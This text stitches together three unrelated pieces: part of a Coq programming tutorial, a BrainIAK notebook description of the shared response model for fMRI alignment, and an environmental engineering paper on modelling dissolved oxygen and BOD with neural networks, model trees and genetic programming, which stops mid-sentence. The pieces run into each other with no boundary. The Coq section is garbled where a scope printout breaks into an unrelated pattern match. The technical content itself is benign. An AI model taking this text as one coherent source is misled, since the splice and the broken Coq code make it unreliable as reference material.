(* 8 : Z *) (* Integer equality checking *) Compute 1 =? 2. (* false : bool *) (* Locate is useful for finding the origin and definition of notations *) Locate "_ =? _". (* Z.eqb x y : Z_scope *) Close Scope Z_scope. (* We're back to nat being the default interpetation of "+" *) Compute 1 + 7. (* 8 : nat *) (* Scopes can also be opened inline with the shorthand % *) Compute (3 * -7)%Z. (* -21%Z : Z *) (* Coq declares by default the following interpretation scopes: core_scope, type_scope, function_scope, nat_scope, bool_scope, list_scope, int_scope, uint_scope. You may also want the numerical scopes Z_scope (integers) and Q_scope (fractions) held in the ZArith and QArith module respectively. *) (* You can print the contents of scopes *) Print Scope nat_scope. (* Scope nat_scope Delimiting key is nat Bound to classes nat Nat.t "x 'mod' y" := Nat.modulo x y "x ^ y" := Nat.pow x y "x ?= y" := Nat.compare x y "x >= y" := ge x y "x > y" := gt x y "x =? y" := Nat.eqb x y "x a end. (* A destructuring let is available if a pattern match is irrefutable *) Definition my_fst2 {A B : Type} (x : A * B) : A := let (a,b) := x in a. (*** Lists ***) (* Lists are built by using cons and nil or by using notation available in list_scope. *) Compute cons 1 (cons 2 (cons 3 nil)). (* (1 :: 2 :: 3 :: nil)%list : list nat *) Compute (1 :: 2 :: 3 :: nil)%list. (* There is also list notation available in the ListNotations modules *) Require Import List. Import ListNotations. Compute [1 ; 2 ; 3]. (* [1; 2; 3] : list nat *) (* There are a large number of list manipulation functions available, lncluding: • length • head : first element (with default) • tail : all but first element • app : appending • rev : reverse • nth : accessing n-th element (with default) • map : applying a function • flat_map : applying a function returning lists • fold_left : iterator (from head to tail) • fold_right : iterator (from tail to head) *) Definition my_list : list nat := [47; 18; 34]. Compute List.length my_list. (* 3 : nat *) (* All functions in coq must be total, so indexing requires a default value *) Compute List.nth 1 my_list 0. (* 18 : nat *) Compute List.map (fun x => x * 2) my_list. (* [94; 36; 68] : list nat *) Compute List.filter (fun x => Nat.eqb (Nat.modulo x 2) 0) my_list. (* [18; 34] : list nat *) Compute (my_list ++ my_list)%list. (* [47; 18; 34; 47; 18; 34] : list nat *) (*** Strings ***) Require Import Strings.String. Open Scope string_scope. (* Use double quotes for string literals. *) Compute "hi"%string. (* Strings can be concatenated with the "++" operator. *) Compute String.append "Hello " "World". (* "Hello World" : string *) Compute "Hello " ++ "World". (* "Hello World" : string *) (* Strings can be compared for equality *) Compute String.eqb "Coq is fun!"%string "Coq is fun!"%string. (* true : bool *) Compute ("no" =? "way")%string. (* false : bool *) Close Scope string_scope. 
(*** Other Modules ***) (* Other Modules in the standard library that may be of interest: • Logic : Classical logic and dependent equality • Arith : Basic Peano arithmetic • PArith : Basic positive integer arithmetic • NArith : Basic binary natural number arithmetic • ZArith : Basic relative integer arithmetic • Numbers : Various approaches to natural, integer and cyclic numbers (currently axiomatically and on top of 2^31 binary words) • Bool : Booleans (basic functions and results) • Lists : Monomorphic and polymorphic lists (basic functions and results), Streams (infinite sequences defined with co-inductive types) • Sets : Sets (classical, constructive, finite, infinite, power set, etc.) • FSets : Specification and implementations of finite sets and finite maps (by lists and by AVL trees) • Reals : Axiomatization of real numbers (classical, basic functions, integer part, fractional part, limit, derivative, Cauchy series, power series and results,...) • Relations : Relations (definitions and basic results) • Sorting : Sorted list (basic definitions and heapsort correctness) • Strings : 8-bits characters and strings • Wellfounded : Well-founded relations (basic results) *) (*** User-defined data types ***) (* Because Coq is dependently typed, defining type aliases is no different than defining an alias for a value. *) Definition my_three : nat := 3. Definition my_nat : Type := nat. (* More interesting types can be defined using the Inductive vernacular. Simple enumeration can be defined like so *) Inductive ml := OCaml | StandardML | Coq. Definition lang := Coq. (* Has type "ml". *) (* For more complicated types, you will need to specify the types of the constructors. *) (* Type constructors don't need to be empty. *) Inductive my_number := plus_infinity | nat_value : nat -> my_number. Compute nat_value 3. (* nat_value 3 : my_number *) (* Record syntax is sugar for tuple-like types. It defines named accessor functions for the components *) Record Point2d (A : Set) := mkPoint2d { x2 : A ; y2 : A }. Definition mypoint : Point2d nat := {| x2 := 2 ; y2 := 3 |}. Compute x2 nat mypoint. (* 2 : nat *) Compute mypoint.(x2 nat). (* 2 : nat *) (* Types can be parameterized, like in this type for "list of lists of anything". 'a can be substituted with any type. *) Definition list_of_lists a := list (list a). Definition list_list_nat := list_of_lists nat. (* Types can also be recursive. Like in this type analogous to built-in list of naturals. *) Inductive my_nat_list := EmptyList | NatList : nat -> my_nat_list -> my_nat_list. Compute NatList 1 EmptyList. (* NatList 1 EmptyList : my_nat_list *) (** Matching type constructors **) Inductive animal := Dog : string -> animal | Cat : string -> animal. Definition say x := match x with | Dog x => (x ++ " says woof")%string | Cat x => (x ++ " says meow")%string end. Compute say (Cat "Fluffy"). (* "Fluffy says meow". *) (** Traversing data structures with pattern matching **) (* Recursive types can be traversed with pattern matching easily. Let's see how we can traverse a data structure of the built-in list type. Even though the built-in cons ("::") looks like an infix operator, it's actually a type constructor and can be matched like any other. *) Fixpoint sum_list l := match l with | [] => 0 | head :: tail => head + (sum_list tail) end. Compute sum_list [1; 2; 3]. (* Evaluates to 6 *) (*** A Taste of Proving ***) (* Explaining the proof language is out of scope for this tutorial, but here is a taste to whet your appetite. Check the resources below for more. 
*) (* A fascinating feature of dependently type based theorem provers is that the same primitive constructs underly the proof language as the programming features. For example, we can write and prove the proposition A and B implies A in raw Gallina *) Definition my_theorem : forall A B, A /\ B -> A := fun A B ab => match ab with | (conj a b) => a end. (* Or we can prove it using tactics. Tactics are a macro language to help build proof terms in a more natural style and automate away some drudgery. *) Theorem my_theorem2 : forall A B, A /\ B -> A. Proof. intros A B ab. destruct ab as [ a b ]. apply a. Qed. (* We can prove easily prove simple polynomial equalities using the automated tactic ring. *) Require Import Ring. Require Import Arith. Theorem simple_poly : forall (x : nat), (x + 1) * (x + 2) = x * x + 3 * x + 2. Proof. intros. ring. Qed. (* Here we prove the closed form for the sum of all numbers 1 to n using induction *) Fixpoint sumn (n : nat) : nat := match n with | 0 => 0 | (S n') => n + (sumn n') end. Theorem sum_formula : forall n, 2 * (sumn n) = (n + 1) * n. Proof. intros. induction n. - reflexivity. (* 0 = 0 base case *) - simpl. ring [IHn]. (* induction step *) Qed. With this we have only scratched the surface of Coq. It is a massive ecosystem with many interesting and peculiar topics leading all the way up to modern research. ## Further reading * [The Coq reference manual](https://coq.inria.fr/refman/) * [Software Foundations](https://softwarefoundations.cis.upenn.edu/) * [Certfied Programming with Dependent Types](http://adam.chlipala.net/cpdt/) * [Mathematical Components](https://math-comp.github.io/mcb/) * [Coq'Art: The Calculus of Inductive Constructions](http://www.cse.chalmers.se/research/group/logic/TypesSS05/resources/coq/CoqArt/) * [FRAP](http://adam.chlipala.net/frap/) Bonus. An uneditted list of tactics. You’d probably prefer https://pjreddie.com/coq-tactics/ (*** Tactics ***) (* Although we won't explain their use in detail, here is a list of common tactics. *) (* * exact * simpl * intros * apply * assert * destruct * induction * reflexivity * rewrite * inversion * injection * discriminate * fold * unfold Tacticals * try * ; * repeat * Automatic * auto * eauto * tauto * ring * ring_simplify * psatz * lia * ria LTac is a logic programming scripting language for tactics From Tatics chapter of LF intros: move hypotheses/variables from goal to context reflexivity: finish the proof (when the goal looks like e = e) apply: prove goal using a hypothesis, lemma, or constructor apply... in H: apply a hypothesis, lemma, or constructor to a hypothesis in the context (forward reasoning) apply... with...: explicitly specify values for variables that cannot be determined by pattern matching simpl: simplify computations in the goal simpl in H: ... or a hypothesis rewrite: use an equality hypothesis (or lemma) to rewrite the goal rewrite ... in H: ... or a hypothesis symmetry: changes a goal of the form t=u into u=t symmetry in H: changes a hypothesis of the form t=u into u=t unfold: replace a defined constant by its right-hand side in the goal unfold... in H: ... or a hypothesis destruct... as...: case analysis on values of inductively defined types destruct... eqn:...: specify the name of an equation to be added to the context, recording the result of the case analysis induction... 
as...: induction on values of inductively defined types injection: reason by injectivity on equalities between values of inductively defined types discriminate: reason by disjointness of constructors on equalities between values of inductively defined types assert (H: e) (or assert (e) as H): introduce a "local lemma" e and call it H generalize dependent x: move the variable x (and anything else that depends on it) from the context back to an explicit hypothesis in the goal formula clear H: Delete hypothesis H from the context. subst x: For a variable x, find an assumption x = e or e = x in the context, replace x with e throughout the context and current goal, and clear the assumption. subst: Substitute away all assumptions of the form x = e or e = x (where x is a variable). rename... into...: Change the name of a hypothesis in the proof context. For example, if the context includes a variable named x, then rename x into y will change all occurrences of x to y. assumption: Try to find a hypothesis H in the context that exactly matches the goal; if one is found, behave like apply H. contradiction: Try to find a hypothesis H in the current context that is logically equivalent to False. If one is found, solve the goal. constructor: Try to find a constructor c (from some Inductive definition in the current environment) that can be applied to solve the current goal. If one is found, behave like apply c. (* Dependent types. Using dependent types for programming tasks tends to be rather unergonomic in Coq. We briefly mention here as an advanced topic that there exists a more sophistictaed match statement that is needed for dependently typed. See for example the "Convoy" pattern. *) (*** Other topics ***) (* Dependently Typed Programming - Most of the above syntax has its equivalents in OCaml. Coq also has the capability for full dependently typed programming. There is an extended pattern matching syntax available for this purpose. Extraction - Coq can be extracted to OCaml and Haskell code for their more performant runtimes and ecosystems Modules / TypeClasses - Modules and Typeclasses are methods for organizing code. They allow a different form of overloading than Notation Setoids - Termination - Gallina is a total functional programming language. It will not allow you to write functions that do not obviously terminate. For functions that do terminate but non-obviously, it requires some work to get Coq to understand this. Coinductive - Coinductive types such as streams are possibly infinite values that stay productive. *)
# Shared response model¶ Authors: Javier Turek ([email protected]), Samuel A. Nastase ([email protected]), Hugo Richard ([email protected]) This notebook provides interactive examples of functional alignment using the shared response model (SRM; Chen et al., 2015). BrainIAK includes several variations on the SRM algorithm, but here we focus on the core probabilistic SRM implementation. The goal of the SRM is to capture shared responses across participants performing the same task in a way that accommodates individual variability in response topographies (Haxby et al., 2020). Given data that is synchronized in the temporal dimension across a group of subjects, SRM computes a low dimensional shared feature subspace common to all subjects. The method also constructs orthogonal weights to map between the shared subspace and each subject's idiosyncratic voxel space. This notebook accompanies the manuscript "BrainIAK: The Brain Imaging Analysis Kit" by Kumar and colleagues (2020). The functional alignment (funcalign) module includes the following variations of SRM: #### Annotated bibliography¶ 1. Chen, P. H. C., Chen, J., Yeshurun, Y., Hasson, U., Haxby, J., & Ramadge, P. J. (2015). A reduced-dimension fMRI shared response model. In C. Cortes, N. D. Lawrence, D. D. Lee, M. Sugiyama, R. Garnett (Eds.), Advances in Neural Information Processing Systems, vol. 28 (pp. 460-468). link Introduces the SRM method of functional alignment with several performance benchmarks. 2. Haxby, J. V., Guntupalli, J. S., Nastase, S. A., & Feilong, M. (2020). Hyperalignment: modeling shared information encoded in idiosyncratic cortical topographies. eLife, 9, e56601. link Recent review of hyperalignment and related functional alignment methods. 3. Chen, J., Leong, Y. C., Honey, C. J., Yong, C. H., Norman, K. A., & Hasson, U. (2017). Shared memories reveal shared structure in neural activity across individuals. Nature Neuroscience, 20(1), 115-125. link SRM is used to discover the dimensionality of shared representations across subjects. 4. Nastase, S. A., Liu, Y. F., Hillman, H., Norman, K. A., & Hasson, U. (2020). Leveraging shared connectivity to aggregate heterogeneous datasets into a common response space. NeuroImage, 217, 116865. link This paper demonstrates that applying SRM to functional connectivity data can yield a shared response space across disjoint datasets with different subjects and stimuli. ### Example fMRI data and atlas¶ To work through the SRM functionality, we use an fMRI dataset collected while participants listened to a spoken story called "I Knew You Were Black" by Carol Daniel. These data are available as part of the publicly available Narratives collection (Nastase et al., 2019). Here, we download a pre-packaged subset of the data from Zenodo. These data have been preprocessed using fMRIPrep with confound regression in AFNI. We apply the SRM to a region of interest (ROI) comprising the "temporal parietal" network according to a cortical parcellation containing 400 parcels from Schaefer and colleagues (2018). Once data is loaded, we divide the data into two halves for a two fold validation. We will use one half for training SRM and the other for testing its performance. Then, we normalize the data each half. ### Estimating the SRM¶ Next, we train the SRM on the training data. We need to specify desired dimension of the shared feature space. Although we simply use 50 features, the optimal number of dimensions can be found using grid search with cross-validation. 
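As a minimal sketch of this training step (assuming BrainIAK's probabilistic SRM implementation in `brainiak.funcalign.srm`; the synthetic arrays and variable names below are illustrative stand-ins for the notebook's ROI data, not its exact code):

```python
import numpy as np
from brainiak.funcalign.srm import SRM

# Synthetic stand-in for the story-listening ROI data: one (voxels x TRs)
# array per subject, z-scored over time, split into train and test halves.
rng = np.random.default_rng(0)
n_subjects, n_voxels, n_trs, n_features = 5, 300, 200, 50
train_data = [rng.standard_normal((n_voxels, n_trs)) for _ in range(n_subjects)]
test_data = [rng.standard_normal((n_voxels, n_trs)) for _ in range(n_subjects)]

srm = SRM(n_iter=20, features=n_features)   # 20 EM iterations, 50 shared features
srm.fit(train_data)

shared_response = srm.s_   # (n_features x n_TRs) shared time series
weights = srm.w_           # list of per-subject (n_voxels x n_features) bases

# Orthogonality check: W_i^T W_i should be close to the identity matrix.
w0 = weights[0]
print(np.allclose(w0.T @ w0, np.eye(n_features), atol=1e-5))

# Project held-out runs into the shared space with the learned weights.
shared_test = srm.transform(test_data)      # list of (n_features x n_TRs) arrays
```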
We also need to specify a number of iterations to ensure the SRM algorithm converges. After training SRM, we obtain a shared response $S$ that contains the values of the features for each TR, and a set of weight matrices $W_i$ that project from the shared subspace to each subject's idiosyncratic voxel space. Let us check the orthogonal property of the weight matrix $W_i$ for a subject. We visualize $W_i^TW_i$, which should be the identity $I$ matrix with shape equal to the number of features we selected. ## Between-subject time-segment classification¶ When we trained SRM above, we learned the weight matrices $W_i$ and the shared response $S$ for the training data. The weight matrices further allow us to convert new data to the shared feature space. We call the transform() function to transform test data for each subject into the shred space. We evaluate the performance of the SRM using a between-subject time-segment classification (or "time-segment matching") analysis with leave-one-subject-out cross-validation (e.g. Haxby et al., 2011; Chen et al., 2015. The function receives the data from N subjects with a specified window size win_size for the time segments. A segment is the concatenation of win_size TRs. Then, using the averaged data from N-1 subjects it tries to match the segments from the left-out subject to the right position. The function returns the average accuracy across segments for each subject. Let's compute time segment matching accuracy for the anatomically-aligned data: Now, we compute it after transforming the subjects data with SRM: Lastly, we plot the classification accuracies to compare methods. ## Summary¶ The SRM allows us to find a reduced-dimension shared response spaces that resolves functional–topographical idiosyncrasies across subjects. We can use the resulting transformation matrices to project test data from any given subject into the shared space. The plot above shows the time segment matching accuracy for the training data, the test data without any transformation, and the test data when SRM is applied. The average performance without SRM is 11%, whereas with SRM is boosted to 40%. Projecting data into the shared space dramatically improves between-subject classification. #### References¶ • Chen, P. H. C., Chen, J., Yeshurun, Y., Hasson, U., Haxby, J., & Ramadge, P. J. (2015). A reduced-dimension fMRI shared response model. In C. Cortes, N.D. Lawrence, D.D. Lee, M. Sugiyama, R. Garnett (Eds.), Advances in Neural Information Processing Systems, vol. 28 (pp. 460-468). https://papers.nips.cc/paper/5855-a-reduced-dimension-fmri-shared-response-model • Haxby, J. V., Guntupalli, J. S., Connolly, A. C., Halchenko, Y. O., Conroy, B. R., Gobbini, M. I., Hanke, M., & Ramadge, P. J. (2011). A common, high-dimensional model of the representational space in human ventral temporal cortex. Neuron, 72(2), 404-416. https://doi.org/10.1016/j.neuron.2011.08.026 • Haxby, J. V., Guntupalli, J. S., Nastase, S. A., & Feilong, M. (2020). Hyperalignment: Modeling shared information encoded in idiosyncratic cortical topographies. eLife, 9, e56601. https://doi.org/10.7554/eLife.56601 • Nastase, S. A., Liu, Y. F., Hillman, H., Norman, K. A., & Hasson, U. (2020). Leveraging shared connectivity to aggregate heterogeneous datasets into a common response space. NeuroImage, 217, 116865. https://doi.org/10.1016/j.neuroimage.2020.116865 • Anderson, M. J., Capota, M., Turek, J. S., Zhu, X., Willke, T. L., Wang, Y., Chen P.-H., Manning, J. R., Ramadge, P. J., & Norman, K. A. (2016). 
Enabling factor analysis on thousand-subject neuroimaging datasets. 2016 IEEE International Conference on Big Data, pages 1151–1160. http://ieeexplore.ieee.org/document/7840719/ • Turek, J. S., Willke, T. L., Chen, P.-H., & Ramadge, P. J. (2017). A semi-supervised method for multi-subject fMRI functional alignment. 2017 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), pages 1098–1102. https://ieeexplore.ieee.org/document/7952326 • Turek, J. S., Ellis, C. T., Skalaban, L. J., Willke, T. L., & Turk-Browne, N. B. (2018). Capturing Shared and Individual Information in fMRI Data, 2018 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP 2018), pages 826-830. https://ieeexplore.ieee.org/document/8462175 • Richard, H., Martin, L., Pinho, A. L., Pillow, J., & Thirion, B. (2019). Fast shared response model for fMRI data. arXiv:1909.12537. https://arxiv.org/abs/1909.12537
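For completeness, here is a rough NumPy sketch of the between-subject time-segment classification described above: leave one subject out, average the remaining subjects, concatenate win_size TRs into segment vectors, and match each left-out segment to the reference segment with the highest correlation. This is an illustrative reimplementation under those assumptions, not BrainIAK's own utility, and for brevity it does not exclude segments that overlap the probe segment as the full analysis does.

```python
import numpy as np

def time_segment_matching(data, win_size=10):
    """data: list of (features x TRs) arrays, one per subject, in a common space."""
    data = [d - d.mean(axis=1, keepdims=True) for d in data]
    n_subj, n_trs = len(data), data[0].shape[1]
    n_seg = n_trs - win_size + 1
    accuracies = []
    for test in range(n_subj):
        # Reference time course: average of the N-1 remaining subjects.
        avg = np.mean([data[s] for s in range(n_subj) if s != test], axis=0)
        # Each segment is the concatenation of win_size TRs into one vector.
        ref = np.stack([avg[:, t:t + win_size].ravel() for t in range(n_seg)])
        probe = np.stack([data[test][:, t:t + win_size].ravel() for t in range(n_seg)])
        # Correlate every probe segment with every reference segment.
        ref_z = (ref - ref.mean(1, keepdims=True)) / ref.std(1, keepdims=True)
        probe_z = (probe - probe.mean(1, keepdims=True)) / probe.std(1, keepdims=True)
        corr = probe_z @ ref_z.T / ref.shape[1]
        accuracies.append(np.mean(corr.argmax(axis=1) == np.arange(n_seg)))
    return np.array(accuracies)

# e.g. accuracies = time_segment_matching(srm.transform(test_data), win_size=10)
```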
Sahu, Londhe, and Kulkarni: Modelling dissolved oxygen and biochemical oxygen demand using data-driven techniques

### Abstract

Precise quantification of biochemical oxygen demand (BOD) and dissolved oxygen (DO) is critically important for water quality assessment as well as for the development of management policies. BOD and DO are conventionally determined with the standard Winkler-azide method, which is cumbersome and prone to measurement error, so there is a need to devise alternative data-driven techniques (DDTs). In the present study, three different DDTs, namely artificial neural network (ANN), multigene genetic programming (MGGP) and M5 model tree (M5T), were used to predict DO and BOD for three separate stretches of the Mula-Mutha River in Pune, India. Additionally, an attempt was made to predict BOD using the modelled DO, which shows the possibility of using a modelled parameter in the development of another model. Model performance was assessed through the root mean square error (RMSE), mean absolute relative error (MARE) and coefficient of correlation (R). Results for the three stations indicate that ANN and MGGP both performed well, with R above 0.85 and RMSE below 1 mg/L for two of the three stations. MGGP and M5T can also identify the influential input parameters, as seen from the input frequency distribution in MGGP and the coefficients of the input parameters in M5T.

### 1. Introduction

Water is one of the basic needs of human beings, and rivers play a very important role in human life. Water quality is a major concern in India, along with other developing countries, as 75–80% of health issues arise from waterborne diseases [1] and river quality is pushed to its threshold by the mixing of untreated industrial and domestic wastes. Timely monitoring and control of surface water quality parameters has therefore become a major concern. Water quality monitoring includes the measurement and monitoring of a wide variety of physical, chemical, and biological parameters. Organic pollution is one of the important categories of river pollution and drastically affects the ecological health of ecosystems; the quantity of organic matter present in a river directly influences its biochemical oxygen demand (BOD), chemical oxygen demand (COD) and dissolved oxygen (DO) content. Biochemical oxygen demand represents the amount of dissolved oxygen utilized by microorganisms to convert biodegradable organic matter into a stable inorganic form. COD is the total quantity of oxygen consumed in the complete chemical breakdown of the organic substances present in the water. DO is another key parameter in river water quality analysis, as it represents the amount of free dissolved oxygen present in the water body. With respect to organic pollution, DO, BOD and COD are thus the main parameters used to analyze the quality and pollution status of a river. Laboratory measurement of COD is time consuming and cumbersome, and the presence of various interfering inorganic substances can at times distort the results [2]. For BOD determination, a water sample is traditionally diluted with aerated dilution water and incubated in the dark at 20°C for 5 days; the DO of the sample is determined initially and again after 5 days. These methods do not consider algal respiration and ammonia oxidation and thus are less accurate [3].
Additionally, the method is protracted, tedious, and subject to various measurement errors [4]. To overcome these limitations there is a need to devise alternative techniques to estimate COD, BOD and DO for subsequent management. Appropriate, reliable, and quick methods for water quality monitoring, with particular reference to DO, BOD and COD, are essentially required. Many researchers have attempted to utilize data-driven techniques (DDT) for the prediction of BOD and DO [3]. A data-driven technique is an approach that extracts the relationship between the state variables (input-output) of a specific system by using computational methods, and it can supersede or replace a knowledge-driven model based on physical behaviour [5]. Data-driven techniques can also be referred to as a computational approach with contributions from data mining, knowledge extraction from databases, artificial intelligence, soft computing, machine learning and pattern recognition. The advantage of using data-driven models lies in the computational methodology that helps uncover non-linear and complex relationships between system variables [6]. The basic goal of DDT is to minimize the difference between observed and simulated output. Examples of the most commonly used DDTs for water quality parameters are Artificial Neural Networks (ANN), Genetic Programming (GP), and Fuzzy Logic (FL). Of the three techniques mentioned above, ANNs have been used to predict DO [7–9] and BOD and DO [4, 10] of river water. Basant et al. [3] modelled BOD and DO using linear regression and ANN simultaneously; the results show that ANN performs relatively better than linear regression and is more capable of capturing the nonlinear relationships existing between the variables of a complex system. Schmid et al. [11] and Talib et al. [12] employed a multi-layer perceptron with back-propagation learning to forecast DO and BOD, and the results indicated that these models were capable of capturing the long-term trend for DO and BOD. Chen et al. [13] developed an FFBP-ANN to predict the DO levels of the Feitsui Reservoir in China with reasonable accuracy. Sarkar et al. [14] used ANN to predict DO at a downstream location by using data from the upstream and central parts of the river with high accuracy (correlation coefficient = 0.99). Olyaie et al. [15] compared the accuracy of ANN, linear genetic programming (LGP), radial basis function (RBF) networks and support vector machines (SVM) in predicting DO. The study demonstrated that SVM performs best with a 0.99 correlation coefficient, followed by 0.96, 0.91 and 0.81 for the best LGP, ANN and RBF models respectively. Besides these, many researchers have tried to model DO and BOD using other data-driven techniques like Multivariate Adaptive Regression Splines (MARS), polynomial chaos expansion, etc. For example, Heddam and Kisi [16] implemented MARS to simulate DO and compared its accuracy with the least square support vector machine (LSSVM). The study showed that MARS performed best, with the maximum R (0.965) and minimum RMSE and MAE values of 0.547 and 0.386 mg/L respectively, followed by LSSVM. From all the studies mentioned earlier, it is observed that ANN has been used prominently to estimate BOD or DO and shows good performance; however, the major impediment in its implementation is the lack of a simple mathematical expression for producing the final output, which makes it less portable [17].
Techniques like the Model Tree with the M5 algorithm (M5T) and Multigene Genetic Programming (MGGP), a variant of genetic programming, are seldom used for the prediction of water quality parameters. The current work therefore predicts DO and BOD from observed data and further predicts BOD using the predicted DO. The techniques used in the current study are the Artificial Neural Network, the Model Tree with the M5 algorithm and Multigene Genetic Programming. The novelty of the study lies in the use of M5T and MGGP for modelling DO and BOD. These techniques, though not very new, are sparingly used in civil engineering in general and in pollution studies in particular, perhaps due to the popularity of artificial neural networks (ANN) over the last two decades or so. The major advantage of utilizing M5T and MGGP is that M5T presents its output in the form of a series of equations and MGGP in the form of a single equation, which can be readily used. Considerable research on modelling DO using causative parameters can be found; however, modelling BOD using M5T and MGGP is rarely reported. Traditional methods also demand time (at least 5 days) to determine DO and BOD, whereas DDT, owing to their characteristics, can compute the predictions much faster (in a few minutes) [3]. Further, in the current study, the accuracy and applicability of both the MGGP and M5T models are compared with the ANN model using the statistical error measures of root mean square error (RMSE), mean absolute relative error (MARE), and coefficient of correlation (R), along with visual presentation in the form of scatter plots. The paper is organized as follows: the techniques used are introduced in the next section, followed by information on the study area and data. Results and discussion are presented next, with concluding remarks at the end.

### 2.1. Artificial Neural Network

An artificial neural network (ANN) is one of the most flexible mathematical structures, developed after considering the working of the biological nervous system. It resembles the human brain in two respects: knowledge to identify complex nonlinear behavior or patterns is acquired by the network through a learning process, and the strengths of the interneuron connections, known as synaptic weights, are used to store the knowledge. Generally, an ANN consists of an input layer, an output layer and one or more hidden layers, with or without a bias at each layer. Each layer consists of one or more nodes or neurons which transfer information from the input to the output layer. The numbers of neurons in the input and output layers are problem dependent (equal to the numbers of independent and dependent parameters respectively). However, the number of hidden layers and the number of neurons in each hidden layer differ from problem to problem and are governed by the accuracy requirements. Generally, a three-layered feed-forward neural network is found adequate to solve non-linear problems in civil and environmental engineering [18]. The inputs are multiplied by weights and a bias is added. This weighted input is then passed through a transfer function to yield the output of the first (input) layer. This output then becomes the input for the next hidden layer, where it is multiplied by the layer weights and a bias is added; the sum is passed through another transfer function (the same as or different from the first one) to yield the output of the first hidden layer. The process is continued till the last (output) layer is reached. At the output layer the error is calculated by taking the difference between the network output, i.e., the predicted value, and the target value.
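To make the forward calculation just described concrete, the sketch below traces one input pattern through a 6-input, single-hidden-layer network with a log-sigmoid hidden layer and a linear output, the type of architecture used later in this study. This is only a minimal illustration in Python/NumPy: the weights, biases, input values and target are random placeholders, not the trained values or data from the paper.

```python
import numpy as np

def logsig(z):
    # log-sigmoid transfer function used in the hidden layer
    return 1.0 / (1.0 + np.exp(-z))

rng = np.random.default_rng(0)

# Placeholder network: 6 inputs -> 10 hidden neurons -> 1 output (e.g., DO)
W1, b1 = rng.normal(size=(10, 6)), rng.normal(size=10)   # hidden-layer weights and biases
W2, b2 = rng.normal(size=(1, 10)), rng.normal(size=1)    # output-layer weights and bias

x = rng.random(6)                 # one normalized input pattern (pH, EC, Alk., TS, TDS, NO3-N)
hidden = logsig(W1 @ x + b1)      # weighted inputs plus bias, passed through the transfer function
y_pred = W2 @ hidden + b2         # linear ('purelin') output layer

target = np.array([0.75])         # placeholder observed (normalized) DO value
error = np.mean((y_pred - target) ** 2)   # mean squared error at the output layer
print(y_pred, error)
```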
The error is minimized by adjusting the weights and biases, moving in the backward direction using an error-reduction algorithm, till the targeted accuracy in the output is achieved. This is called training a feed-forward back-propagation ANN, where information is processed in the forward direction and the error is distributed in the backward direction. There are other types of ANN as well, such as radial basis function neural networks, generalized regression neural networks, and recurrent neural networks, which are outside the scope of the present study. The trained weights and biases are then retained and applied to unseen data for testing purposes. If the model performance in testing is satisfactory, which is judged by applying one or more statistical parameters as well as visual inspection, it is said to be ready for actual operation. The relation of the weights with the input and output is demonstrated in Fig. S1. Readers can refer to [19–23] for the detailed working of an ANN.

### 2.2. M5 Model Tree

A model tree utilizes a divide-and-conquer approach to provide the rules by which a linear model at a leaf node is reached. The linear models are then developed to quantify the contribution of each attribute to the overall predicted value. The M5 Model Tree (M5T) is a reconstruction of Quinlan's M5 algorithm for inducing regression trees of models [25]. M5T combines a standard decision tree with the possibility of linear regression functions at the nodes. For building model trees using the M5 algorithm, an attribute is first chosen on the basis of higher uncertainty or high standard deviation to represent the root node, and one branch is created for each conceivable value; the example set is then divided into subsets, one for each attribute value. For each branch, the procedure may be repeated recursively, utilising just the samples that actually reach the branch. If all samples at a node have the same classification at any point, the tree's growth is halted [26, 27]. Splitting criteria are used to determine which attribute is picked for a split for a given set of samples. The percentage split determines how much of the data is retained for training; the remaining data are used to determine the model's accuracy during the testing phase. Several samples (or folds) may be made from the training dataset using cross-validation folds: if N folds are built, the model is run N times, and each time one of the folds is kept for validation while the remaining N-1 folds are used to train the model. The cross-validation result is computed by averaging the results of all folds. The more cross-validation folds employed, the more accurate the model tends to become, because the model trains on randomly chosen data, which increases its robustness [28, 29]. Fig. S2 (a) describes the splitting of the input variables x1 and x2 into different linear regression functions at the leaves, namely LM1–LM6, by using the M5 algorithm. The simplified form of the model equation is y = b0 + b1x1 + b2x2, in which b0, b1, and b2 are linear regression constants, and Fig. S2 (b) shows the relation of the branches in the form of a tree diagram. For details of MT, readers are referred to [28, 30].
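The divide-and-conquer idea behind a model tree can be illustrated with a toy sketch in which a single split on one attribute routes a sample to one of two linear models at the leaves. The split threshold and the coefficients below are invented for illustration only; they are not the models reported later in this paper.

```python
def predict_m5_toy(ec, alk, ph):
    # Toy M5-style model tree: one split, two linear models at the leaves.
    # Threshold and coefficients are illustrative placeholders.
    if ec <= 450.0:                       # split on the attribute giving the largest SD reduction
        return -0.003 * ec - 0.02 * alk + 0.15 * ph + 4.0   # LM1
    else:
        return -0.005 * ec - 0.01 * alk + 0.26 * ph + 1.7   # LM2

print(predict_m5_toy(ec=300.0, alk=120.0, ph=7.6))
print(predict_m5_toy(ec=600.0, alk=150.0, ph=7.2))
```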
### 2.3. Genetic Programming and Multi Gene Genetic Programming

Genetic programming (GP) is a domain-independent method that genetically breeds a population of random computer programs to solve a problem. It comes under supervised machine learning and searches for its solution in a program space instead of a data space. The solutions, in the form of programs created by traditional GP, are represented as tree structures and expressed using a functional programming language. GP follows the principle of survival of the fittest: the one who is fit is going to survive and be involved in the evolution of the next generation. Initially, to generate the population, solutions are searched blindly in a large program space by conducting a tournament. GP assigns a fitness value to each program in the population as a measure of its performance on the task. The two programs that perform best win the tournament and are selected for the next evolution. The GP algorithm copies the two winning programs and transposes them into two new programs via genetic operators (crossover or mutation), i.e., the winners now have offspring, and two losing programs are replaced in the population by the new child programs from the tournament. The creation of new child programs continues till a specified number of children in a generation are produced. The best program appearing across the generations is designated as the GP result. Fig. S3 represents a typical GP model and its functions; the functions can contain basic mathematical operators (e.g., +, −, ×, /), Boolean logic functions (e.g., AND, OR, NOT), trigonometric functions (e.g., sin, cos), or any other user-defined functions. Multigene genetic programming (MGGP) is a variant of GP. It is designed to create compact mathematical models of the targeted response (output) data that are multigene in nature; in other terms, nonlinear transformations of the input variables, kept low order by restricting the gene or tree depth, are combined in a linearly weighted sum. The standard GP representation is based on the evaluation of a single tree (model) expression, whereas in MGGP multigene individuals consist of a number of genes, each of which is represented as a traditional GP tree expression [32]. Firstly, the numbers of populations and generations are chosen for the MGGP model, which often depends on the complexity of the problem and the number of alternative solutions. A large number of populations and generations are examined in order to develop models with the least amount of uncertainty. Once the population of genes is generated and the fitness function values are evaluated, each gene is modified based on the principles of natural evolution through mutation and crossover, thus producing offspring. The mutation process picks branches, along with their sub-nodes, and replaces each with a randomly generated subtree. In the crossover operation, terminals or branch nodes of the parent trees are randomly 